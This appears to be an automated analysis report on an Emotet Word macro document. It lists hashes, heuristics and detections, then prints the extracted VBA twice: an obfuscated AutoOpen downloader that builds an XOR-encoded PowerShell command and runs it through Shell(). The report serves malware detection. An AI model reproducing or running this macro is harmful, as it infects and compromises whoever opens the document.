Emotet Office (OLE) malware analysis — malicious · 0cde82a70af66975

MALICIOUS

Office (OLE)

92.2 KB Created: 2018-06-20 16:48:00 Authoring application: Microsoft Office Word First seen: 2018-07-04

MD5: 6f3b2767f35287163a3d54a9ced93f8f SHA-1: cfb3b1273b8f8533f7a594202566ff04a1c47a0c SHA-256: 0cde82a70af66975034f93ae52b6a7a9bc0be76dc25e8da666bc97fff05eed0c

210 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function to execute a PowerShell command. The reconstructed PowerShell command is 'OwerSHe ll . ( $VErBoS eprefEREnCE .tOStRI ng()[1,3]+'X'-JOIN'')("21F70e94P88Z114e121P91r17F12P17F95w84@70l28r94l83w91_84P82F69G17r67@80l95P85l94G92@10@21G119F75r103G71l101@100F17P12_17@95Z84w70@28r94l83P91@84F82G69l17G98l72r66Z69_84Z92r31w127F84F69@31e102_84e83F114l93P88_84")'. This indicates the document is designed to download and execute a second-stage payload, a common Emotet tactic. The ClamAV detection also strongly suggests the Emotet family.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6878585-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6878585-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

VWOMi = CDate(86711)
HKABno = kKFriWbGzhM + Shell(EipUXVCEt + KQMIblIjO + DJXiAYiIzt, 11856 - 11856)
soYlz = LzAZvq

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub AutoOpen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10922 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10922 bytes
SHA-256: `d5651a954127d0143cbfee8faf12ee7f2f51be7c0e331b49e9d2f9c2b273fb46`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "MwvQXlFYLAM" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "TWsSKiaVwtTDK" Function CWqiKVjzwIw() On Error Resume Next istiG = 56728 jHRjQ = CDate(TLqnH + Sin(37310 + 41363) * 25455 * CInt(6068)) DaIcE = pPjjGi ikKiY = CDate(27474) BbJrL = CByte(vitsKh) MooXRt = 44754 DizHtnk = "OwerSHe" + "ll " + ". " + "( " + "$VErBoS" + "eprefEREnCE" CpddLW = 5245 uOoPj = CDate(wdzFz + Sin(37873 + 98856) * 67727 * CInt(59444)) UzzcYo = ttkbHX CCkBp = CDate(12949) krLGf = CByte(GEPlMs) JaaDik = 78465 djUAjOX = ".tOStRI" + "nG()[1,3]" + "+'X'" + "-JOIN'')(" HiDWLO = 52525 XImYc = CDate(wviTFA + Sin(84042 + 85632) * 70115 * CInt(18596)) AwzpEl = aYomW hqFICI = CDate(80707) tjXNPB = CByte(inGkvV) XWdcFK = 76649 KHPjUcwpYPU = " ('21" + "F70e9" + "4P88Z114e121P91" + "r17F12P17F95w84" + "@70l" + "28r94l83w91_84" + "P82F69G1" EPYmHk = 26852 zUhVik = CDate(kTzhUR + Sin(10318 + 33061) * 99517 * CInt(61745)) PFUMqs = wsUZTS zEoMYm = CDate(23080) HoGwh = CByte(KqjTW) YNfrXQ = 80902 rPjKhISTXSj = "7r6" + "7@80l" + "95P85l" + "94G92@10@21G1" + "19F" + "75r103G71l" + "101@10" + "0F17P" + "12_1" plMLI = 92768 isvMRf = CDate(pIGqiA + Sin(64244 + 71454) * 75346 * CInt(39442)) wJnIS = bFTOW HLAfwQ = CDate(3089) nojwXG = CByte(kipdm) aZXilB = 26475 StbXGlIvONn = "7@" + "95Z84w70@28r9" + "4l83P91@84F8" + "2G69l17G98l72r6" + "6Z69_84Z92" + "r31w1" + "27F84F" + "69@31e102_84e" + "83F114l93P88_84" RRjhBA = 71776 pZoCi = CDate(Wzrmj + Sin(36397 + 46462) * 27597 * CInt(86833)) JsHTUR = WvBsPd MMhSEQ = CDate(8549) DrZaNK = CByte(RrtWZo) mFbKvW = 66637 dDvrlZJQiMs = "l95Z69F10r21w" + "103_127l7" + "5@95F11" + "8e17@12w" + "17Z2" + "2P8" nXnQX = 73569 SjqMs = CDate(zQjZb + Sin(29244 + 2201) * 62903 * CInt(50274)) uwkUFI = fiNSEu GhQHV = CDate(28674) VMwStI = CByte(JkBXn) cYusC = 70376 jwDfQzXfnz = "9r69_69w6" + "5r11Z30Z30" + "P90l67G68" + "l87G86_64l66w65" OYzZV = 62794 EclInT = CDate(VtKLi + Sin(75543 + 10822) * 41182 * CInt(52538)) XCmbms = OBKDv LiijvV = CDate(51055) ZImlj = CByte(VLkuOJ) laqJu = 49954 vAWXQTXpUX = "l31P" + "82e94@9" + "2@30G123_8Z121" + "P9w" + "91e30F" + "113@89@6" + "9P69e65e11r3" + "0Z30Z93w84_" PHQEn = 33731 mjNkoa = CDate(fiZlv + Sin(16550 + 95637) * 77241 * CInt(7681)) qsErF = PCzRi jumIFZ = CDate(74540) DazFMD = CByte(XTnKS) csYMp = 82608 pBOPfDIRLS = "89P68@68G89_88G" + "84F68F31@82e9" + "4@92@" + "30G114Z9" + "9_93w101l88" + "@70Z100e30@11" + "3w89" + "e69r69@65@" + "11w30_30@" UbSavD = 61774 SVrUj = CDate(UjSOHw + Sin(32044 + 95852) * 81083 * CInt(60252)) fcXLs = WilTln whrIW = CDate(48386) YXalG = CByte(EOhhFj) jVYdzs = 79010 pWwPz = "85P80w88_89@" + "80@6" + "9Z66Z68G80e67e" + "92Z80P85@80P65Z" + "68w67F70@94r90" CWqiKVjzwIw = DizHtnk + djUAjOX + KHPjUcwpYPU + rPjKhISTXSj + StbXGlIvONn + dDvrlZJQiMs + jwDfQzXfnz + vAWXQTXpUX + pBOPfDIRLS + pWwPz End Function Function amNPIo() On Error Resume Next KYuaa = 45073 pCmzQZ = CDate(JrwQv + Sin(54020 + 41163) * 87511 * CInt(54847)) LrhRYV = LTKfi vdjwmu = CDate(61036) GPZICV = CByte(tBCZmU) FIOUw = 35596 PYOcd = "l84" + "@67F69@94G31F82" + "F94@92" + "F30e5@" + "87" + "l114@72l2F" + "70@" + "112_" NrqiXI = 58253 sBBvWG = CDate(FoHZNs + Sin(89997 + 74137) * 16941 * CInt(71165)) YLjVwL = qAPIn VnwPoi = CDate(37450) WYKZkG = CByte(bCzOR) DFDar = 21047 YRcBVki = "30e113" + "e89@69F69" + "@65" + "P11Z30r" + "30_" XNUch = 71242 CQOAG = CDate(YhOHGW + Sin(10901 + 6114) * 49485 * CInt(27569)) JsHjm = TSriu fGRzAV = CDate(23266) naBoi = CByte(GHDWEp) AiVOq = 78825 iArFZcc = "3F1Z3w31_7_2e" + "31_0" + "G1l4w31F9l7" + "e30l112Z" + "91P120l1" GIOEGw = 42872 qtmtY = CDate(Pbfmj + Sin(47855 + 17944) * 94549 * CInt(84937)) zLGNK = XrXuVB IvhOz = CDate(57910) PzTjcj = CByte(dqcFm) moXMi = 51097 FaDTEQvtwf = "26_94G97P30@11" + "3w89w69e69" + "_65@11" + "F3" iMCqZ = 51894 dSUCw = CDate(LaDww + Sin(67202 + 90316) * 36188 * CInt(90861)) RCkSZF = nzAAP VvWdwO = CDate(70714) wjdSQ = CByte(hDrQJ) ZIJQb = 96508 jqfkZ = "0G30e70Z70r7" + "0l31P92" + "F80l69@88l95r3" + "P5@31r67@6" + "8@30F7" + "0l82l87G8" + "4l105_97Z" QjbKZ = 65418 usVrRj = CDate(ipFSEd + Sin(38369 + 44384) * 96385 * CInt(94875)) YSSYX = CiiVW hEzVwX = CDate(47703) TaCDzi = CByte(uiSzY) LaUuNG = 841 wZLFDJKwl = "30l22G31_98w" + "65l93F8" + "8e69@25r22l" + "11" + "3_22Z" + "24r10" YZzqw = 35382 TupRmj = CDate(zFjKsj + Sin(33024 + 32491) * 77004 * CInt(44509)) jkVsC = lWAvz iCVLPo = CDate(67770) TRNhzY = CByte(wGRWUv) LizUMo = 25959 kLwOJzEoo = "_21l122r104r11" + "2G98G64F70l17" + "P12P17l21@70F94" + "w88G114" + "Z12" + "1F91l31F95" + "G84_73@69@25w" + "0_29F17l" + "9F5w1Z9@8w2e" + "24@10P2" amNPIo = PYOcd + YRcBVki + iArFZcc + FaDTEQvtwf + jqfkZ + wZLFDJKwl + kLwOJzEoo End Function Function ktzAKOu() On Error Resume Next LGcYHN = 97294 vsSwvo = CDate(jMLjP + Sin(6562 + 65682) * 30980 * CInt(67325)) SMKUw = XaRCWT fQjfzE = CDate(20430) DFRlh = CByte(OEwIas) imAYJL = 74942 EIBrNAGlvKf = "1l93F1" + "26_116P123P9" + "8e17r12" + "F17w21l8" SwUpt = 45078 aCkXjM = CDate(wMmdz + Sin(86496 + 9654) * 42589 * CInt(42779)) jObHL = DOHNG mtPTAZ = CDate(75759) YzzzUf = CByte(ARwKvY) lzzVmw = 89411 VsRbbMo = "4G95G71Z11G69" + "w84@92" + "w65r17@26G17" + "@2" + "2G109@" + "22e17@26l1" + "7Z2" + "1G122" + "_104w112_98w64" + "r70@17F2" ZpiJRl = 98870 IIzhZJ = CDate(himpci + Sin(72377 + 77453) * 43223 * CInt(62926)) MWcJdW = zjoZj jIYzEs = CDate(88338) RaljX = CByte(vTLLWO) NzwfpS = 68384 SGDwwEtwvj = "6e17w22l" + "31e84P" + "73F84G22e1" + "0G87Z94_67" + "w84@80@82" + "G89" + "G25Z21F" + "70e107" + "@99w107_103F1" XRzZTz = 33809 bWkhkc = CDate(rjEpW + Sin(53055 + 71229) * 39357 * CInt(45459)) OtSVL = IaVHkd clHBBP = CDate(74205) vUCSV = CByte(XNwfcY) kVlcZh = 73526 WvwwDtEFACk = "7l88r95G1" + "7r21Z" + "103P127@75w95w" + "118r24w74" + "r69" + "e67Z72Z74l21" + "w119r75@103P71l" + "101G100G3" ILuQi = 96947 XCRWG = CDate(ipwztL + Sin(40127 + 48104) * 41321 * CInt(29695)) tmluf = CNpiVi PVRNG = CDate(62992) ArQkn = CByte(WUaQkb) kDVVRa = 76810 RbVLLbMZ = "1l117P94_" + "70r95w93Z94F80w" + "85" + "w119P88_9" + "3l84_25F21e70" + "r107G99Z107F103" + "P3" + "1w101_94e98" + "l69Z67F8" ZijpI = 5165 iQEuXp = CDate(PccOI + Sin(47042 + 59868) * 76276 * CInt(66554)) ccGprw = nvKkNL JQwIH = CDate(85354) ZHhtF = CByte(TTvcrC) uiKIjX = 51404 pqRizN = "8@95_86@25P" + "24r29Z17@2" + "1l93F126_11" + "6F123Z98G24" ZFpuqB = 83951 pffJFM = CDate(lBfZER + Sin(51259 + 27529) * 61510 * CInt(19477)) usiwp = juljCZ ioBQco = CDate(57304) ikWhBf = CByte(lBqSQH) WQYEqT = 27735 uffOkwcjRDS = "l10w" + "98_69e80Z67" + "F69P28Z97l67r9" + "4_82w84F6" + "6P66P17w21@93w" + "126w116@123P9" + "8e" + "10Z8" NwqDjX = 5826 bjXiSu = CDate(pRJCvd + Sin(70313 + 65453) * 18085 * CInt(63000)) ifUjD = INPsF awibo = CDate(99706) DaVGI = CByte(kGrptd) SDQonq = 5416 bVZXVbkz = "3F67w84l80e90G1" + "0e76F82e80" + "F69@82e89G74w70" + "r67w88F69Z84Z28" + "r89@94P66F69r1" kMEkht = 52049 EZBKG = CDate(iUMYuW + Sin(29559 + 19376) * 25296 * CInt(78599)) RjFrW = ruhVj Eiijj = CDate(92894) AasoBI = CByte(UirdV) oOSvoh = 73554 ODnWCpCXai = "7G21G110G31w1" + "16l7" + "3Z82_84e65l69@8" + "8l94G95_31e1" + "24e84w66l6" + "6r80w" + "86Z84F1" + "0w7" + "6P76'.Spl" ktzAKOu = EIBrNAGlvKf + VsRbbMo + SGDwwEtwvj + WvwwDtEFACk + RbVLLbMZ + pqRizN + uffOkwcjRDS + bVZXVbkz + ODnWCpCXai End Function Function wHaMwdHDdw() On Error Resume Next hBfuGV = 47328 MqlhQm = CDate(TjTcF + Sin(28335 + 35880) * 89207 * CInt(74902)) JstCuA = ULaOQJ KQZTv = CDate(70463) wHGLr = CByte(hRDqNh) hiMdm = 15054 YpNqKw = "It('F" + "G@rw_lPZe' )\|%" + " {[Char]( $_-B" + "xOr '0x31' " + ")})-Joi" IKTDj = 18336 DjYnRC = CDate(mTnLQ + Sin(60936 + 24735) * 85654 * CInt(85334)) nKjiKF = RiLqtY ELBCa = CDate(50266) iPdwJ = CByte(rZRpr) FZOikO = 14675 WvpMOOQl = "n '' )" wHaMwdHDdw = YpNqKw + WvpMOOQl End Function Function RiERIQspNMP() On Error Resume Next iJmIz = CDate(VQBIQ + Sin(79735 + 20276) * 18445 * CInt(37384)) ZdUjt = CDate(35303) STbppI = RAEvod DSzrD = CByte(jnBCCG) ZiFDi = 88574 GZFXY = 54791 mjHiZu = CDate(ZaaZWz + Sin(62356 + 75333) * 18278 * CInt(91069)) IsGjn = CDate(92841) aDMMdT = cLiAu NvAFCB = CByte(RcjVR) cqJwdo = 42331 qtBPPm = 86498 jphJVZ = CDate(SiYUb + Sin(19463 + 18306) * 20415 * CInt(43658)) wjtYf = CDate(84353) RjlPz = YXAAjY oVjLz = CByte(sWaGn) PMJLTd = 12636 HZnrBJ = 98994 ozLAI = Ddkbz IRwqh = CDate(CDzpU + Sin(69335 + 78314) * 36016 * CInt(84882)) OlvuN = 96970 tMcAP = 79931 idMlM = CByte(HwGiiB) mUYSu = CDate(97010) ivcHS = pFwKQ NUUzVi = CDate(StPXER + Sin(73540 + 31354) * 73514 * CInt(26908)) NfVEwd = 7106 dAtNDs = 57159 QNwNqu = CByte(kUizAr) UFGTd = CDate(19305) End Function Function tqYSzIdHqlW() On Error Resume Next wFQBf = wqaEF XLEiXI = CDate(kPpKfw + Sin(82504 + 87739) * 60459 * CInt(43601)) VPGSb = 36984 YPjhDk = 42174 vacETs = CByte(wOIGC) JPfhC = CDate(90738) zozIiAohQm = zpFsEMD + Chr(GJjXH + 80 + EkOcEiHvHj) wJrNhE = Hzcww RnJJdZ = CDate(NpRGGW + Sin(74091 + 27214) * 76438 * CInt(41290)) jKsbjZ = 96871 IDbmY = 13743 DMQkJa = CByte(pUVjz) hivffQ = CDate(89896) nzqSTi = CoJaL uzpju = CDate(woPhci + Sin(58560 + 83710) * 8561 * CInt(17468)) fBUbfE = 49927 nrcpU = 90230 PuTIJE = CByte(lIDGE) WaIRsN = CDate(95341) tqYSzIdHqlW = rVqwvJijSwT + zozIiAohQm + CWqiKVjzwIw + amNPIo + ktzAKOu + wHaMwdHDdw FMihdU = sdHzI lCpWJi = CDate(YpUVa + Sin(23999 + 78947) * 53841 * CInt(61315)) bOJVws = 42669 zTnbr = 46721 aIiVzc = CByte(NHkbR) iGlVd = CDate(9057) End Function Function IkVMfoIB(KQMIblIjO) On Error Resume Next ZuhSi = ROjri CmkzD = CDate(XsrSA + Sin(11362 + 64995) * 80061 * CInt(84137)) HMUPh = 45675 jzARGS = 23682 OBEhCa = CByte(QQWMI) kdfXPP = CDate(32793) rnrZzf = HfMtzW tSjzP = CDate(dEowTj + Sin(20465 + 56271) * 25012 * CInt(4835)) TkwNj = 46233 jqLfmd = 5810 EMCzu = CByte(HzUiwm) VWOMi = CDate(86711) HKABno = kKFriWbGzhM + Shell(EipUXVCEt + KQMIblIjO + DJXiAYiIzt, 11856 - 11856) soYlz = LzAZvq zaZiHV = CDate(XrHVsE + Sin(79932 + 71457) * 57791 * CInt(80114)) RJCIYO = 30189 iWcZh = 88840 WITjUq = CByte(ntmzr) RjHSKk = CDate(86091) End Function Sub AutoOpen() On Error Resume Next RNUmTB = FzkEz VbQDjn = CDate(XWIjT + Sin(96805 + 24787) * 38680 * CInt(48494)) NVSQC = 60918 nBmnd = 7933 wfbwdc = CByte(rDaLbw) IVJcA = CDate(87309) Application.Run WbzVtaK + "IkVMfoIB" + zhnmfliSpc, kjAwHwUEW + tqYSzIdHqlW + criSL ziQEad = NjbiH UhhKj = CDate(OfYXi + Sin(35812 + 72490) * 68704 * CInt(70061)) utppT = 64254 HmqwUz = 90678 cIzFn = CByte(iKnZEC) DwlCw = CDate(45440) End Sub

SHA-256: d5651a954127d0143cbfee8faf12ee7f2f51be7c0e331b49e9d2f9c2b273fb46

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "MwvQXlFYLAM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TWsSKiaVwtTDK"
Function CWqiKVjzwIw()
On Error Resume Next
istiG = 56728
jHRjQ = CDate(TLqnH + Sin(37310 + 41363) * 25455 * CInt(6068))
DaIcE = pPjjGi
ikKiY = CDate(27474)
BbJrL = CByte(vitsKh)
MooXRt = 44754
DizHtnk = "OwerSHe" + "ll " + ". " + "( " + "$VErBoS" + "eprefEREnCE"
CpddLW = 5245
uOoPj = CDate(wdzFz + Sin(37873 + 98856) * 67727 * CInt(59444))
UzzcYo = ttkbHX
CCkBp = CDate(12949)
krLGf = CByte(GEPlMs)
JaaDik = 78465
djUAjOX = ".tOStRI" + "nG()[1,3]" + "+'X'" + "-JOIN'')("
HiDWLO = 52525
XImYc = CDate(wviTFA + Sin(84042 + 85632) * 70115 * CInt(18596))
AwzpEl = aYomW
hqFICI = CDate(80707)
tjXNPB = CByte(inGkvV)
XWdcFK = 76649
KHPjUcwpYPU = " ('21" + "F70e9" + "4P88Z114e121P91" + "r17F12P17F95w84" + "@70l" + "28r94l83w91_84" + "P82F69G1"
EPYmHk = 26852
zUhVik = CDate(kTzhUR + Sin(10318 + 33061) * 99517 * CInt(61745))
PFUMqs = wsUZTS
zEoMYm = CDate(23080)
HoGwh = CByte(KqjTW)
YNfrXQ = 80902
rPjKhISTXSj = "7r6" + "7@80l" + "95P85l" + "94G92@10@21G1" + "19F" + "75r103G71l" + "101@10" + "0F17P" + "12_1"
plMLI = 92768
isvMRf = CDate(pIGqiA + Sin(64244 + 71454) * 75346 * CInt(39442))
wJnIS = bFTOW
HLAfwQ = CDate(3089)
nojwXG = CByte(kipdm)
aZXilB = 26475
StbXGlIvONn = "7@" + "95Z84w70@28r9" + "4l83P91@84F8" + "2G69l17G98l72r6" + "6Z69_84Z92" + "r31w1" + "27F84F" + "69@31e102_84e" + "83F114l93P88_84"
RRjhBA = 71776
pZoCi = CDate(Wzrmj + Sin(36397 + 46462) * 27597 * CInt(86833))
JsHTUR = WvBsPd
MMhSEQ = CDate(8549)
DrZaNK = CByte(RrtWZo)
mFbKvW = 66637
dDvrlZJQiMs = "l95Z69F10r21w" + "103_127l7" + "5@95F11" + "8e17@12w" + "17Z2" + "2P8"
nXnQX = 73569
SjqMs = CDate(zQjZb + Sin(29244 + 2201) * 62903 * CInt(50274))
uwkUFI = fiNSEu
GhQHV = CDate(28674)
VMwStI = CByte(JkBXn)
cYusC = 70376
jwDfQzXfnz = "9r69_69w6" + "5r11Z30Z30" + "P90l67G68" + "l87G86_64l66w65"
OYzZV = 62794
EclInT = CDate(VtKLi + Sin(75543 + 10822) * 41182 * CInt(52538))
XCmbms = OBKDv
LiijvV = CDate(51055)
ZImlj = CByte(VLkuOJ)
laqJu = 49954
vAWXQTXpUX = "l31P" + "82e94@9" + "2@30G123_8Z121" + "P9w" + "91e30F" + "113@89@6" + "9P69e65e11r3" + "0Z30Z93w84_"
PHQEn = 33731
mjNkoa = CDate(fiZlv + Sin(16550 + 95637) * 77241 * CInt(7681))
qsErF = PCzRi
jumIFZ = CDate(74540)
DazFMD = CByte(XTnKS)
csYMp = 82608
pBOPfDIRLS = "89P68@68G89_88G" + "84F68F31@82e9" + "4@92@" + "30G114Z9" + "9_93w101l88" + "@70Z100e30@11" + "3w89" + "e69r69@65@" + "11w30_30@"
UbSavD = 61774
SVrUj = CDate(UjSOHw + Sin(32044 + 95852) * 81083 * CInt(60252))
fcXLs = WilTln
whrIW = CDate(48386)
YXalG = CByte(EOhhFj)
jVYdzs = 79010
pWwPz = "85P80w88_89@" + "80@6" + "9Z66Z68G80e67e" + "92Z80P85@80P65Z" + "68w67F70@94r90"
CWqiKVjzwIw = DizHtnk + djUAjOX + KHPjUcwpYPU + rPjKhISTXSj + StbXGlIvONn + dDvrlZJQiMs + jwDfQzXfnz + vAWXQTXpUX + pBOPfDIRLS + pWwPz
End Function
Function amNPIo()
On Error Resume Next
KYuaa = 45073
pCmzQZ = CDate(JrwQv + Sin(54020 + 41163) * 87511 * CInt(54847))
LrhRYV = LTKfi
vdjwmu = CDate(61036)
GPZICV = CByte(tBCZmU)
FIOUw = 35596
PYOcd = "l84" + "@67F69@94G31F82" + "F94@92" + "F30e5@" + "87" + "l114@72l2F" + "70@" + "112_"
NrqiXI = 58253
sBBvWG = CDate(FoHZNs + Sin(89997 + 74137) * 16941 * CInt(71165))
YLjVwL = qAPIn
VnwPoi = CDate(37450)
WYKZkG = CByte(bCzOR)
DFDar = 21047
YRcBVki = "30e113" + "e89@69F69" + "@65" + "P11Z30r" + "30_"
XNUch = 71242
CQOAG = CDate(YhOHGW + Sin(10901 + 6114) * 49485 * CInt(27569))
JsHjm = TSriu
fGRzAV = CDate(23266)
naBoi = CByte(GHDWEp)
AiVOq = 78825
iArFZcc = "3F1Z3w31_7_2e" + "31_0" + "G1l4w31F9l7" + "e30l112Z" + "91P120l1"
GIOEGw = 42872
qtmtY = CDate(Pbfmj + Sin(47855 + 17944) * 94549 * CInt(84937))
zLGNK = XrXuVB
IvhOz = CDate(57910)
PzTjcj = CByte(dqcFm)
moXMi = 51097
FaDTEQvtwf = "26_94G97P30@11" + "3w89w69e69" + "_65@11" + "F3"
iMCqZ = 51894
dSUCw = CDate(LaDww + Sin(67202 + 90316) * 36188 * CInt(90861))
RCkSZF = nzAAP
VvWdwO = CDate(70714)
wjdSQ = CByte(hDrQJ)
ZIJQb = 96508
jqfkZ = "0G30e70Z70r7" + "0l31P92" + "F80l69@88l95r3" + "P5@31r67@6" + "8@30F7" + "0l82l87G8" + "4l105_97Z"
QjbKZ = 65418
usVrRj = CDate(ipFSEd + Sin(38369 + 44384) * 96385 * CInt(94875))
YSSYX = CiiVW
hEzVwX = CDate(47703)
TaCDzi = CByte(uiSzY)
LaUuNG = 841
wZLFDJKwl = "30l22G31_98w" + "65l93F8" + "8e69@25r22l" + "11" + "3_22Z" + "24r10"
YZzqw = 35382
TupRmj = CDate(zFjKsj + Sin(33024 + 32491) * 77004 * CInt(44509))
jkVsC = lWAvz
iCVLPo = CDate(67770)
TRNhzY = CByte(wGRWUv)
LizUMo = 25959
kLwOJzEoo = "_21l122r104r11" + "2G98G64F70l17" + "P12P17l21@70F94" + "w88G114" + "Z12" + "1F91l31F95" + "G84_73@69@25w" + "0_29F17l" + "9F5w1Z9@8w2e" + "24@10P2"
amNPIo = PYOcd + YRcBVki + iArFZcc + FaDTEQvtwf + jqfkZ + wZLFDJKwl + kLwOJzEoo
End Function
Function ktzAKOu()
On Error Resume Next
LGcYHN = 97294
vsSwvo = CDate(jMLjP + Sin(6562 + 65682) * 30980 * CInt(67325))
SMKUw = XaRCWT
fQjfzE = CDate(20430)
DFRlh = CByte(OEwIas)
imAYJL = 74942
EIBrNAGlvKf = "1l93F1" + "26_116P123P9" + "8e17r12" + "F17w21l8"
SwUpt = 45078
aCkXjM = CDate(wMmdz + Sin(86496 + 9654) * 42589 * CInt(42779))
jObHL = DOHNG
mtPTAZ = CDate(75759)
YzzzUf = CByte(ARwKvY)
lzzVmw = 89411
VsRbbMo = "4G95G71Z11G69" + "w84@92" + "w65r17@26G17" + "@2" + "2G109@" + "22e17@26l1" + "7Z2" + "1G122" + "_104w112_98w64" + "r70@17F2"
ZpiJRl = 98870
IIzhZJ = CDate(himpci + Sin(72377 + 77453) * 43223 * CInt(62926))
MWcJdW = zjoZj
jIYzEs = CDate(88338)
RaljX = CByte(vTLLWO)
NzwfpS = 68384
SGDwwEtwvj = "6e17w22l" + "31e84P" + "73F84G22e1" + "0G87Z94_67" + "w84@80@82" + "G89" + "G25Z21F" + "70e107" + "@99w107_103F1"
XRzZTz = 33809
bWkhkc = CDate(rjEpW + Sin(53055 + 71229) * 39357 * CInt(45459))
OtSVL = IaVHkd
clHBBP = CDate(74205)
vUCSV = CByte(XNwfcY)
kVlcZh = 73526
WvwwDtEFACk = "7l88r95G1" + "7r21Z" + "103P127@75w95w" + "118r24w74" + "r69" + "e67Z72Z74l21" + "w119r75@103P71l" + "101G100G3"
ILuQi = 96947
XCRWG = CDate(ipwztL + Sin(40127 + 48104) * 41321 * CInt(29695))
tmluf = CNpiVi
PVRNG = CDate(62992)
ArQkn = CByte(WUaQkb)
kDVVRa = 76810
RbVLLbMZ = "1l117P94_" + "70r95w93Z94F80w" + "85" + "w119P88_9" + "3l84_25F21e70" + "r107G99Z107F103" + "P3" + "1w101_94e98" + "l69Z67F8"
ZijpI = 5165
iQEuXp = CDate(PccOI + Sin(47042 + 59868) * 76276 * CInt(66554))
ccGprw = nvKkNL
JQwIH = CDate(85354)
ZHhtF = CByte(TTvcrC)
uiKIjX = 51404
pqRizN = "8@95_86@25P" + "24r29Z17@2" + "1l93F126_11" + "6F123Z98G24"
ZFpuqB = 83951
pffJFM = CDate(lBfZER + Sin(51259 + 27529) * 61510 * CInt(19477))
usiwp = juljCZ
ioBQco = CDate(57304)
ikWhBf = CByte(lBqSQH)
WQYEqT = 27735
uffOkwcjRDS = "l10w" + "98_69e80Z67" + "F69P28Z97l67r9" + "4_82w84F6" + "6P66P17w21@93w" + "126w116@123P9" + "8e" + "10Z8"
NwqDjX = 5826
bjXiSu = CDate(pRJCvd + Sin(70313 + 65453) * 18085 * CInt(63000))
ifUjD = INPsF
awibo = CDate(99706)
DaVGI = CByte(kGrptd)
SDQonq = 5416
bVZXVbkz = "3F67w84l80e90G1" + "0e76F82e80" + "F69@82e89G74w70" + "r67w88F69Z84Z28" + "r89@94P66F69r1"
kMEkht = 52049
EZBKG = CDate(iUMYuW + Sin(29559 + 19376) * 25296 * CInt(78599))
RjFrW = ruhVj
Eiijj = CDate(92894)
AasoBI = CByte(UirdV)
oOSvoh = 73554
ODnWCpCXai = "7G21G110G31w1" + "16l7" + "3Z82_84e65l69@8" + "8l94G95_31e1" + "24e84w66l6" + "6r80w" + "86Z84F1" + "0w7" + "6P76'.Spl"
ktzAKOu = EIBrNAGlvKf + VsRbbMo + SGDwwEtwvj + WvwwDtEFACk + RbVLLbMZ + pqRizN + uffOkwcjRDS + bVZXVbkz + ODnWCpCXai
End Function
Function wHaMwdHDdw()
On Error Resume Next
hBfuGV = 47328
MqlhQm = CDate(TjTcF + Sin(28335 + 35880) * 89207 * CInt(74902))
JstCuA = ULaOQJ
KQZTv = CDate(70463)
wHGLr = CByte(hRDqNh)
hiMdm = 15054
YpNqKw = "It('F" + "G@rw_lPZe' )|%" + " {[Char]( $_-B" + "xOr '0x31' " + ")})-Joi"
IKTDj = 18336
DjYnRC = CDate(mTnLQ + Sin(60936 + 24735) * 85654 * CInt(85334))
nKjiKF = RiLqtY
ELBCa = CDate(50266)
iPdwJ = CByte(rZRpr)
FZOikO = 14675
WvpMOOQl = "n '' )"
wHaMwdHDdw = YpNqKw + WvpMOOQl
End Function

Function RiERIQspNMP()
On Error Resume Next
iJmIz = CDate(VQBIQ + Sin(79735 + 20276) * 18445 * CInt(37384))
ZdUjt = CDate(35303)
STbppI = RAEvod
DSzrD = CByte(jnBCCG)
ZiFDi = 88574
GZFXY = 54791
mjHiZu = CDate(ZaaZWz + Sin(62356 + 75333) * 18278 * CInt(91069))
IsGjn = CDate(92841)
aDMMdT = cLiAu
NvAFCB = CByte(RcjVR)
cqJwdo = 42331
qtBPPm = 86498
jphJVZ = CDate(SiYUb + Sin(19463 + 18306) * 20415 * CInt(43658))
wjtYf = CDate(84353)
RjlPz = YXAAjY
oVjLz = CByte(sWaGn)
PMJLTd = 12636
HZnrBJ = 98994
ozLAI = Ddkbz
IRwqh = CDate(CDzpU + Sin(69335 + 78314) * 36016 * CInt(84882))
OlvuN = 96970
tMcAP = 79931
idMlM = CByte(HwGiiB)
mUYSu = CDate(97010)
ivcHS = pFwKQ
NUUzVi = CDate(StPXER + Sin(73540 + 31354) * 73514 * CInt(26908))
NfVEwd = 7106
dAtNDs = 57159
QNwNqu = CByte(kUizAr)
UFGTd = CDate(19305)
End Function
Function tqYSzIdHqlW()
On Error Resume Next
wFQBf = wqaEF
